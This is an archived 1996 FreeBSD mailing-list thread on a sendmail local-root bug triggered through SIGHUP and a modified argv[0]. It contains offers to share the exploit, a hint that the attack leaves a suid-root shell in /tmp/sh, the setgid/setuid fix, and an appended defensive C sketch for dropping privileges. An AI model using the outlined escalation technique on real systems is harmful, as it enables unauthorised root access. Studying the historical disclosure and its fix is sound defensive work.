Date: Sat, 16 Nov 1996 17:24:55 -0600 (CST)
From: "S(pork)"
X-Sender: spork@super-g.inch.com
To: Karl Denninger
cc: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org
Subject: Re: New sendmail bug...
In-Reply-To: <199611170017.SAA16884@Jupiter.Mcs.Net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Thanks, also I just installed smrsh on a whim (I'm definitely not a C
expert, very very novice here) and smrsh (included in the sendmail dist)
takes care of the problem as well... Exploit to follow...

Charles

On Sat, 16 Nov 1996, Karl Denninger wrote:

> >
> > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with
> > more knowledge on this issue can check it out, please post to the list so
> > everyone can free themselves of this vulnerability. Root in under 15
> > seconds with an account on the machine. If you need the 'sploit, please
> > mail me here and I'll send it to you. I verified it on FBSD, NetBSD,
> > Linux so far...
> >
> > TIA
> >
> > Charles
>
> It's real - and the fix is two lines inserted in the sighup() handler:
>
>         setgid(RealGid);
>         setuid(RealUid);
>
> prior to the exec call.
>
> --
> --
> Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity
> http://www.mcs.net/~karl     | T1's from $600 monthly to FULL DS-3 Service
>                              | 33 Analog Prefixes, 13 ISDN, Web servers $75/mo
> Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/
> Fax:   [+1 312 248-9865]     | 2 FULL DS-3 Internet links; 400Mbps B/W Internal
>

From owner-freebsd-security Sat Nov 16 16:55:30 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA01245 for security-outgoing; Sat, 16 Nov 1996 16:55:30 -0800 (PST)
Received: from chaos.ecpnet.com (raistlin@chaos.ecpnet.com [204.246.64.13]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA01227; Sat, 16 Nov 1996 16:55:26 -0800 (PST)
Received: from localhost (raistlin@localhost) by chaos.ecpnet.com (8.8.2/8.7.3) with SMTP id SAA01881; Sat, 16 Nov 1996 18:56:48 -0600
Date: Sat, 16 Nov 1996 18:56:47 -0600 (CST)
From: Justen Stepka
To: "S(pork)"
cc: freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG
Subject: Re: New sendmail bug...
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Sat, 16 Nov 1996, S(pork) wrote:

> It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with
> more knowledge on this issue can check it out, please post to the list so
> everyone can free themselves of this vulnerability. Root in under 15
> seconds with an account on the machine. If you need the 'sploit, please
> mail me here and I'll send it to you. I verified it on FBSD, NetBSD,
> Linux so far...
>
> TIA
>
> Charles
>

I tested this on FBSD and I couldn't get it to work. Though when I tried
it on Linux it worked in about 10 seconds :(, currently I have disabled
accounts on my machines until I fix the problem.

------------------------------------------------------------------------------
Justen Stepka         | http://www.ecpnet.com/~raistlin
Network Administrator | "This space for rent"
raistlin@ecpnet.com   | 3.0-CURRENT FreeBSD 3.0-CURRENT
------------------------------------------------------------------------------

From owner-freebsd-security Sat Nov 16 17:05:50 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA01810 for security-outgoing; Sat, 16 Nov 1996 17:05:50 -0800 (PST)
Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA01805; Sat, 16 Nov 1996 17:05:43 -0800 (PST)
Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.3/8.8.3) with ESMTP id CAA16908; Sun, 17 Nov 1996 02:06:57 +0100 (MET)
From: Wolfgang Ley
Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.3/8.8.3) id CAA10374; Sun, 17 Nov 1996 02:06:56 +0100 (MET)
Message-Id: <199611170106.CAA10374@tiger.cert.dfn.de>
Subject: Re: New sendmail bug...
To: spork@super-g.com (S)
Date: Sun, 17 Nov 1996 02:06:55 +0100 (MET)
Cc: karl@Mcs.Net, freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org
In-Reply-To: from "S" at Nov 16, 96 05:24:55 pm
Organization: DFN-CERT (Computer Emergency Response Team, Germany)
Content-Type: text
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

S wrote:
>
> Thanks, also I just installed smrsh on a whim (I'm definitely not a C
> expert, very very novice here) and smrsh (included in the sendmail dist)
> takes care of the problem as well... Exploit to follow...

smrsh won't help you protect against the new problem (restarting
sendmail via sighup and modified argv[0]). sendmail 8.8.3 (which is
currently being tested) will fix the problem.

Or are you talking about another (new?) problem?

Bye,
Wolfgang.
--
Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany
Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241
PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW
from http://www.cert.dfn.de/~ley/ ...have a nice day

From owner-freebsd-security Sat Nov 16 17:27:21 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA02850 for security-outgoing; Sat, 16 Nov 1996 17:27:21 -0800 (PST)
Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id RAA02845; Sat, 16 Nov 1996 17:27:19 -0800 (PST)
Received: from super-g.inch.com (super-g.com) by mail.crl.com with SMTP id AA14134 (5.65c/IDA-1.5); Sat, 16 Nov 1996 17:28:16 -0800
Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id TAA13300; Sat, 16 Nov 1996 19:25:48 -0500
Date: Sat, 16 Nov 1996 18:25:48 -0600 (CST)
From: "S(pork)"
X-Sender: spork@super-g.inch.com
To: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org
Subject: Re: New sendmail bug...
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

And even though it looked like it did not work with smrsh installed, it
does... Can anyone with a public UNIX box say "sitting duck"? And on the
weekend I have to find out about this. If only I were a programmer instead
of a lowly SA with few C skills...

Charles

On Sat, 16 Nov 1996, S(pork) wrote:

> It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with
> more knowledge on this issue can check it out, please post to the list so
> everyone can free themselves of this vulnerability. Root in under 15
> seconds with an account on the machine. If you need the 'sploit, please
> mail me here and I'll send it to you. I verified it on FBSD, NetBSD,
> Linux so far...
>
> TIA
>
> Charles
>

From owner-freebsd-security Sat Nov 16 17:35:29 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA04038 for security-outgoing; Sat, 16 Nov 1996 17:35:29 -0800 (PST)
Received: from mail.id.net (mail.id.net [199.125.1.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA04033; Sat, 16 Nov 1996 17:35:25 -0800 (PST)
Received: from server.id.net (server.id.net [199.125.1.10]) by mail.id.net (8.7.5/ID-Net) with ESMTP id UAA02467; Sat, 16 Nov 1996 20:39:44 -0500 (EST)
Received: (from rls@localhost) by server.id.net (8.7.5/8.7.3) id UAA06048; Sat, 16 Nov 1996 20:35:34 -0500 (EST)
From: Robert Shady
Message-Id: <199611170135.UAA06048@server.id.net>
Subject: Re: New sendmail bug...
In-Reply-To: from Justen Stepka at "Nov 16, 96 06:56:47 pm"
To: raistlin@chaos.ecpnet.com (Justen Stepka)
Date: Sat, 16 Nov 1996 20:35:34 -0500 (EST)
Cc: spork@super-g.com, freebsd-security@freebsd.org, freebsd-hackers@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL25 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with
> > more knowledge on this issue can check it out, please post to the list so
> > everyone can free themselves of this vulnerability. Root in under 15
> > seconds with an account on the machine. If you need the 'sploit, please
> > mail me here and I'll send it to you. I verified it on FBSD, NetBSD,
> > Linux so far...

Please send me this one, I have several shell servers here I'd like to
test & plug...

-- Rob
===
Innovative Data Services Serving South-Eastern Michigan
Internet Service Provider / Hardware Sales / Consulting Services
Voice: (810)855-0404 / Fax: (810)855-3268 / Web: http://www.id.net

From owner-freebsd-security Sat Nov 16 20:24:59 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA25631 for security-outgoing; Sat, 16 Nov 1996 20:24:59 -0800 (PST)
Received: from irbs.irbs.com (jc@irbs.irbs.com [199.182.75.129]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA25624 for ; Sat, 16 Nov 1996 20:24:53 -0800 (PST)
Received: (from jc@localhost) by irbs.irbs.com (8.8.2/8.8.0) id XAA09008; Sat, 16 Nov 1996 23:24:33 -0500 (EST)
Message-Id: <199611170424.XAA09008@irbs.irbs.com>
Date: Sat, 16 Nov 1996 23:24:33 -0500
From: jc@irbs.com (John Capo)
To: raistlin@chaos.ecpnet.com (Justen Stepka)
Cc: freebsd-security@FreeBSD.org
Subject: Re: New sendmail bug...
References:
X-Mailer: Mutt 0.49-PL10
Mime-Version: 1.0
In-Reply-To: ; from Justen Stepka on Nov 16, 1996 18:56:47 -0600
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Quoting Justen Stepka (raistlin@chaos.ecpnet.com):
>
> I tested this on FBSD and I couldn't get it to work. Though when I tried
> it on Linux it worked in about 10 seconds :(, currently I have disabled
> accounts on my machines until I fix the problem.
>

Look at /tmp/sh, you may find it suid root. Sendmail may not have
had a chance to get the shell copied and suid by the time the exploit
script tries to run /tmp/sh.

John Capo

From owner-freebsd-security Sat Nov 16 20:57:58 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA26407 for security-outgoing; Sat, 16 Nov 1996 20:57:58 -0800 (PST)
Received: from quagmire.ki.net (root@quagmire.ki.net [205.150.102.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA26386; Sat, 16 Nov 1996 20:57:46 -0800 (PST)
Received: from localhost (scrappy@localhost) by quagmire.ki.net (8.8.2/8.7.5) with SMTP id XAA13291; Sat, 16 Nov 1996 23:57:40 -0500 (EST)
Date: Sat, 16 Nov 1996 23:57:40 -0500 (EST)
From: "Marc G. Fournier"
To: "S(pork)"
cc: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org
Subject: Re: New sendmail bug...
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Sat, 16 Nov 1996, S(pork) wrote:

> It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with
> more knowledge on this issue can check it out, please post to the list so
> everyone can free themselves of this vulnerability. Root in under 15
> seconds with an account on the machine. If you need the 'sploit, please
> mail me here and I'll send it to you. I verified it on FBSD, NetBSD,
> Linux so far...
>

Please send details on 'sploit...would like to test on my Solaris
2.5.1 box as well...

Thanks...

Marc G. Fournier                                 scrappy@ki.net
Systems Administrator @ ki.net               scrappy@freebsd.org
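
Added example, not part of any message in this thread and not sendmail's code: the thread's fix drops privileges before the restart but ignores the results of setgid() and setuid(), and the restart is driven by argv[0]. The sketch below checks every step of the drop and refuses a restart path that is relative, not a regular file, or writable by others; the function names and the trusted_uid parameter are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Permanently drop to the real uid/gid of the invoking user.
 * Returns 0 on success, -1 if a step fails or the drop can be undone. */
int drop_to_real_ids(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* Group first: after the uid is dropped, changing the gid may be denied. */
    if (setgid(rgid) != 0)
        return -1;
    if (setuid(ruid) != 0)
        return -1;
    /* Confirm the effective ids really changed instead of trusting the calls. */
    if (getegid() != rgid || geteuid() != ruid)
        return -1;
    /* A non-root invoker must not be able to get root back. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* Hypothetical helper: accept a restart path only if it is absolute, a regular
 * file, owned by trusted_uid and not writable by group or others.
 * Returns 1 if acceptable, 0 otherwise. */
int restart_path_ok(const char *path, uid_t trusted_uid)
{
    struct stat st;

    if (path == NULL || path[0] != '/')
        return 0;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;
    if (st.st_uid != trusted_uid)
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;
    return 1;
}

/* Re-exec only when both checks pass. Returns -1 on refusal or exec failure. */
int checked_reexec(char *const argv[], uid_t trusted_uid)
{
    if (argv == NULL || !restart_path_ok(argv[0], trusted_uid))
        return -1;
    if (drop_to_real_ids() != 0)
        return -1;
    execv(argv[0], argv);
    return -1;
}

int main(int argc, char *argv[])
{
    (void)argc;
    /* Report the checks for this process; it does not re-exec anything. */
    printf("restart_path_ok(\"%s\", 0) = %d\n", argv[0], restart_path_ok(argv[0], 0));
    printf("drop_to_real_ids() = %d\n", drop_to_real_ids());
    return EXIT_SUCCESS;
}
```

The stat() and execv() calls are separate steps, so the path check is only meaningful when the directories leading to the file are not writable by untrusted users.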